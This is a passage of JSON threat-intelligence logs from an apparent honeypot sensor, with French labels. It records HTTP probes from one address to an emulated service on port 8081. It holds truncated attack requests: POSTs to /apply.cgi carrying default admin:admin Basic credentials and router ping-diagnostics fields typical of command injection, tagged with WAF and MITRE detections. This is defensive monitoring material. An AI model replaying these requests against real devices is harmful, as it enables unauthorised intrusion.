\u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 334\\r\\nConnection: close\\r\\n\\r\\nchange_action=\u0026submit_button=Basic\u0026action=\u0026commit=0\u0026wan_ip=10.0.0.1\u0026wan_mask=\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 334\\r\\nConnection: close\\r\\n\\r\\nchange_action=\u0026submit_button=Basic\u0026action=\u0026commit=0\u0026wan_ip=10.0.0.1\u0026wan_mask=\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022cf8a32e75b13c4986b5412d104ddaf1b1cb7dd8b\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":513},{"id":11809661,"ip":"45.153.34.252","ts":"2026-07-14 02:29:24.000000","proto":"tcp","src_port":35876,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 529, \u0022payload_entropy\u0022: 5.371261608826124, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00221c5dcf3e0abf2bbffb5e61322e8d6db5b1633b92\u0022, \u0022event_fingerprint\u0022: \u0022776ffb2a7499e20a6aef854f832a2ad0b7b0ea31\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226eac4cfc497297453e2d33e834d222a1\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 350\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026act\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 350\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026act\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002270632b338127dee51d9953a34b0c21d6df0d9a57\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-url\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":529},{"id":11809659,"ip":"45.153.34.252","ts":"2026-07-14 02:29:23.000000","proto":"tcp","src_port":35874,"dst_port":8081,"service":"http","classification":"web_probe","waf_score":3,"waf_tags":"[\u0022950734:sap-sapcontrol-path\u0022]","http_method":"GET","http_target":"\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 3, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 0, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002242099b4af021e53fd8fd4e056c2568d7c2e3ffa8\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 99, \u0022payload_entropy\u0022: 5.018012746618279, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 20.0, \u0022risk_classification\u0022: 38.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 5.1, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 40, \u0022tag_count\u0022: 5, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022d2680103be2dcdd2f3d5a8939d6e6f644380c59b\u0022, \u0022event_fingerprint\u0022: \u00226200042a8eedd96c47b109adc0963a36d177f604\u0022, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00222302682c110a52c654ac710424b04c41\u0022, \u0022path_pattern_hash\u0022: \u00228a5edab282632443219e051e4ade2d1d\u0022}, \u0022service_name\u0022: \u0022http\u0022, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 40}, \u0022payload_preview\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/\u0022, \u0022waf_tags\u0022: [\u0022950734:sap-sapcontrol-path\u0022], \u0022waf_rule_names\u0022: [\u0022sap-sapcontrol-path\u0022], \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nAuthorization: Basic 